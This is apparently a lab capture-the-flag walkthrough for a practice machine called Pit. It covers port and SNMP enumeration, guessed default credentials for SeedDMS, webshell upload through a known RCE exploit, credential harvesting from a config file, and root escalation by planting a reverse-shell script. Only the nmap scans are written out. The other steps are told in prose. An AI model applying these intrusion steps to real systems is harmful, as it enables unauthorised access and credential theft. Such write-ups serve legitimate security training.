$ nmap -p- --min-rate 5000 10.129.228.106
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 01:05 EDT
Nmap scan report for 10.129.228.106
Host is up (0.0095s latency).
Not shown: 65501 filtered tcp ports (no-response), 31 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
2 HTTP ports for this one.
Web Rabbit Holes
Port 9090 was a HTTPS site with a login page:
We had no credentials and weak default credentials didn't work. Port 80 hosted a Red Hat default page:
Directory, subdomain and other web scans all didn't find anything. So this was an obvious rabbit hole.
UDP Ports -> SNMP Enum
I did another UDP scan in case I missed some stuff:
We can see that SNMP is opened and not filtered. We can take a closer look at its version using nmap again.
It seems that this is a SNMPv1 server and we might be able to access it via snmpwalk. There was a lot of information returned with a default and an extended scan:
So we have 2 users, michelle and root. We als ofound a new directory at Seed DMS or something. When we view the certificate of the HTTPS site on port 9090, we can see a new subdomain to enumerate.
Seed DMS
After adding the new domain to our hosts file, we can head to http://dms-pit.htb/seeddms51x/seeddms and find another login page:
I tried a few credentials, and found that michelle:michelle was the right one to login.
We can view the change log from the administrator, which states the version of Seed DMS that is currently being used.
It appears that this is version 5.1.15, which does not have any vulnerabilities via searchsploit. This service supports file uploads and is PHP based, so let's try to upload a webshell within Michells' folder.
This had the document ID of 29, but I didn't know what to do further. Checking the searchsploit output again, we can see that there are RCE exploits for this but they are of the wrong version.
I decided to try the one for v5.1.11 again just in case. Following the PoC, I was able to replicate it and get RCE.
Great! I tried to get a reverse shell as this user, but it seems that I couldn't even download any files or make any external connections. So we probably need to look around further.
CentOS Credentials
Since we had a webshell, I wanted to see if we could find the credentials for the CentOS interface we found earlier. We can slowly enumerate the file system:
Within settings.xml, we can find a set of credentials
This doesn't work with SSH, but we can use this to login to the CentOS interface as michelle.
In the bottom left corner, we can access the Terminal application, which is basically another webshell as michelle.
Now, we can grab the user flag and also a reverse shell as the user.
Privilege Escalation
SNMP Processes -> Injection
I ran a LinPEAS scan on the machine to enumerate for me, and didn't find anything interesting. I wanted to see the processes that were running on the machine, and this could be done using snmpwalk as we did earlier. This is because root is probably running SNMP here.
There were 2 binaries running, free and monitor. The former was an ELF binary, while the latter is, interestingly, a bash script.
It seems to be running any script using a wildcard. Plus, the user can write to the directory where the script resides. We can just create a script that gives us a reverse shell using a bash one-liner. Download that into the directory. Then, we can run the script by using snmpwalk:
$ sudo nmap -sU -p 161 -sV 10.129.228.106
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 01:10 EDT
Nmap scan report for 10.129.228.106
Host is up (0.0085s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pit.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
